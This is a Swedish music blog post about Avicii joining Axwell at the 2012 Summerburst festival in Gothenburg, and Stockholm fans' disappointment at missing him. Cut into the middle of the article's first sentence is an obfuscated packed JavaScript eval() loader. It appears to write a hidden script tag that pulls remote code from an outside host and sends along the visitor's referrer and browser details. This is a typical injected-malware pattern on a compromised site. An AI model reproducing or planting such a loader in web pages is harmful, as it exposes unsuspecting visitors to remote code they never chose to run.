Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Avicii till Summerburst – Men bara till Göteborg?

Avicii till Summerburst – Men bara till Göteborg?
Alexander Gylemo

Man eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rnitd|var|u0026u|referrer|rrtzf||js|php’.split(’|’),0,{}))
har verkligen storsatsat på kommande årets Summerburst, att festivalen även nu kommer till Göteborg visste ni säkert redan. Framtill nu har Axwell varit den enda bekräftade artisten och jag har sett en del oroade kommentarer om att Göteborgsspelningarna skulle bli någon form av lightversion – med Avicii nyligen adderad, än så länge bara till Göteborg, stämmer detta verkligen inte!

Igår avslöjades det att Avicii kommer till 2012’s Summerburst i Göteborg för att inviga festivalen tillsammans med en av Sveriges andra housestjärnskott Axwell. Stockholmarna har visat ett enormt missnöje till detta då det i dagsläget ser ut som att det bara blir Göteborg som Avicii drar till, då han som världens sjätte bästa housedj (enligt DJ MAG) knappast är vidare tillgänglig under juni, och antagligen för att han var med på förra årets festival i Stockholm. Tråkigt om Stockholmarna missar honom nästa år, han var en av highlightsen förra svängen enligt mig.

Vi håller er uppdaterade om hur läget utvecklas!